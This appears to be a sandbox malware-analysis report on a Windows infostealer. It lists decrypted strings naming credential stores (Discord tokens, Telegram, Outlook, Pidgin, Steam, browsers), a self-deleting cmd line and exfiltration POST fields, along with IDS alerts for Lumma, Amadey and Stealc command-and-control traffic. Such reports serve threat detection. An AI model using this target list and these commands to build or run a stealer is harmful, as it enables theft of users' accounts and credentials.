Source: 48.2.num.exe.2a0000.0.unpack String decryptor: files
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \discord\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Local Storage\leveldb
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Telegram Desktop\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: key_datas
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: map*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: F8806DD0C461824F*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Telegram
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Tox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.tox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.ini
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Password
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000001
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000002
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000003
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000004
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Pidgin
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \.purple\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: accounts.xml
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: token:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Valve\Steam
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SteamPath
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \config\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ssfn*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: config.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DialogConfig.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: libraryfolders.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: loginusers.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Steam\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: browsers
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: done
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: soft
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Discord\tokens.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: https
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: POST
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HTTP/1.1
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: hwid
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: build
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: token
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: file_name
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: file
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: message
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: screenshot.jpg
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50142 version: TLS 1.2
Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2992504945.0000020F3083B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: my_library.pdbU source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: my_library.pdb source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: A partial SuggestResult object, without the 'content' parameter.Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000003.2350536379.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2483748959.0000000000592000.00000040.00000001.01000000.00000006.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000003.2873579535.00000000026E0000.00000004.00001000.00020000.00000000.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3008298151.0000000000632000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: number of queries: 1474
Source: firefox.exe Memory has grown: Private usage: 1MB later: 179MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:58018 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:56521 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:58543 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62553 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:65460 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49717 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49729 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49866 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:50950 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:59497 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:61186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49881
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49943 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:52153 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49958 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49967 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49978 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49989 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50001 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:50472 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50005 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:53511 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:52791 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:53992 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50011 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50010 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50015 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50020 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50022 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50023 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50028 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50033 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50032 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50037 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50043 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:63461 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:65047 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:52599 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50081 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50078 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50085 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50084 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50088 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50129 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:58525 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49729 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49958 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50037 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50078 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50085 -> 188.114.96.3:443
